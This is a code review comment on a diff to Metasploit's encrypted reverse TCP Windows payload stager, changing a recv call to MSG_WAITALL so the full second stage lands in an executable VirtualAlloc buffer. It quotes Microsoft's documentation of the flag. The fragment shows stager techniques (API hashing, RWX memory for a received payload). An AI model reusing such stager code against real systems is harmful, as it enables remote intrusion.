lib/msf/core/payload/windows/encrypted_reverse_tcp.rb

```diff
@@ -545,7 +545,7 @@ def stager_comm
         FuncVirtualAlloc VirtualAlloc = (FuncVirtualAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualAlloc')}); // hash('kernel32.dll', 'VirtualAlloc') -> 0xe553a458
         register char *received = VirtualAlloc(NULL, stage_size + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 
-        int recv_stg = RecvData(conn_socket, received, stage_size, 0);
+        int recv_stg = RecvData(conn_socket, received, stage_size, MSG_WAITALL);
```

Comment:
For context this is explained at https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-recv under the flags option as the following:

```
MSG_WAITALL:

The receive request will complete only when one of the following events occurs:

The buffer supplied by the caller is completely full.
The connection has been closed.
The request has been canceled or an error occurred.

```

This means the `recieved` buffer has to be full, or the connection is closed early, or the request from the end user is canceled early, in order for this function to return.